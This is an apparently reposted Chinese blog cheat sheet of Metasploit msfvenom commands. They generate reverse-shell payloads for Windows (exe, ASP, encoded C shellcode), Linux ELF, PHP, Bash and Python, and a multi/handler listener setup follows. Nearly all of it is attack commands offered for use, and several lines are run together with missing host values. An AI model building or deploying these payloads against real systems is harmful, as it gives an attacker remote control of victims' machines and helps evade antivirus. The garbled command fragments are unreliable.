**转载https://www.cnblogs.com/xishaonian/p/7721584.html**
msf 生成反弹 Windows Shell
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.62.129 lport=1234 -f exe -a x86 --platform win -o shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=
X > system.exe msfvenom -p php/meterpreter/reverse_tcp LHOST=
LPORT=443 R > exploit.php msfvenom -p windows/meterpreter/reverse_tcp LHOST=
LPORT=443 -e -a x86 --platform win -f asp -o file.asp msfvenom -p windows/meterpreter/reverse_tcp LHOST=
LPORT=443 -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f c
msf 生成在反弹linux Shell
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip地址 lport=端口 -e -f elf -a x86 --platform linux -o shell
msf 生成反弹 PHP Shell
msfvenom -p php/meterpreter_reverse_tcp lhost=IP地址 lport=端口 -o shell.php
add <?php at the beginning
perl -i~ -0777pe's/^/<?php \n/' shell.php
msf 生成反弹 Bash Shell
msfvenom -p cmd/unix/reverse_bash lhost=IP地址 lport=端口 -o shell.sh
msf 生成反弹 ASP Shell
msfvenom -p windows/meterpreter/reverse_tcp lhost=IP地址 lport=端口 -f asp -a x86 --platform win -o shell.asp
msf 生成反弹 Python Shell
msfvenom -p cmd/unix/reverse_python lhost=ip地址 lport=端口-o shell.py
msf 生成反弹 Shell (C Shellcode)
msfvenom -p windows/shell_reverse_tcp lhost=IP地址 lport=端口 -b "\x00\x0a\x0d" -a x86 --platform win -f c
msf监听
1 use exploit/multi/handler
2 set payload windows/meterpreter/reverse_tcp
3 set LHOST 192.168.1.111
4 Exploit
手机扫一扫
移动阅读更方便
你可能感兴趣的文章